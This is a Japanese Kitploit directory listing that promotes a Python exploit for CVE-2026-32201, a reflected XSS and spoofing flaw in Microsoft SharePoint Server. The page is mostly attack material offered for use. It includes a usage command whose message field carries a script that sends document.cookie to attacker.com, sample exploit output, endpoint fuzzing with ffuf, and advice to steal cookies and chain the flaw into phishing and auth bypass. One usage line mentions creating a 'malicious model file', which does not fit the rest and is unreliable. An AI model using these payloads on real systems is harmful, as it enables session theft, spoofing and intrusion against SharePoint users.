Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-32201-exploit — Pythonエクスプロイト for CVE-2026-32201。Microsoft SharePoint Serverにおける反射型XSSであり、細工されたHTTPリクエストを介して、認証なしのスプーフィングとデータ改ざんを可能にします。 | Kitploit
ツール/GitHubGitHub/b1tbit/cve-2026-32201-exploit
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubb1tbit/cve-2026-32201-exploit

CVE-2026-32201-exploit

Pythonエクスプロイト for CVE-2026-32201。Microsoft SharePoint Serverにおける反射型XSSであり、細工されたHTTPリクエストを介して、認証なしのスプーフィングとデータ改ざんを可能にします。

リポジトリを見る
14ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概要

CVE-2026-32201 用の Python エクスプロイト - Microsoft SharePoint Server における不適切な入力検証により、認証されていないネットワークスプーフィングが可能になります (C:L/I:L)。

  • 影響を受けるバージョン: SharePoint Server 2016 Enterprise、2019、Subscription Edition < 16.0.19725.20210;
  • ベクター: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N;
  • 影響: スプーフィングされた通知/ドキュメントを介した機密データの閲覧/変更。

特徴

  1. SharePoint のフィンガープリンティング。
  2. 入力検証をバイパスするための細工された POST (sender_override)。
  3. カスタマイズ可能なペイロード (送信者、受信者、件名、XSS を含むメッセージ)。
  4. 検証のためのレスポンス分析。

使用方法

  1. exploit.py として保存します。
  2. 実行して悪意のあるモデルファイルを作成します:
root@kitploit:~
python3 exploit.py https://sharepoint.target.com \
  --recipient [email protected] \
  --sender "[email protected]" \
  --message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
  --endpoint /_layouts/15/notify.aspx

出力例:

root@kitploit:~
[+] SharePoint を検出しました。
[*] スプーフィングされたリクエストを https://target.com/_layouts/15/notify.aspx に送信中
[+] ステータス: 200
[+] 成功の可能性: スプーフィングされたコンテンツについてターゲットのログ/メールを確認してください。

カスタマイズ

  • エンドポイントファジング: ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt
  • XSS ペイロード: --message に JS を追加して Cookie を窃取します
  • 連鎖: スプーフィング → フィッシングリンク → 認証バイパス

検証

  • 成功の指標: 200 OK + レスポンス内の "sent/success"
  • サーバー側: ULS ログ/IIS ログで異常なリクエストを確認
  • 影響: 偽造された送信者に関するメール/ドキュメントを監視し、データ改ざんをテストします
ツールをダウンロード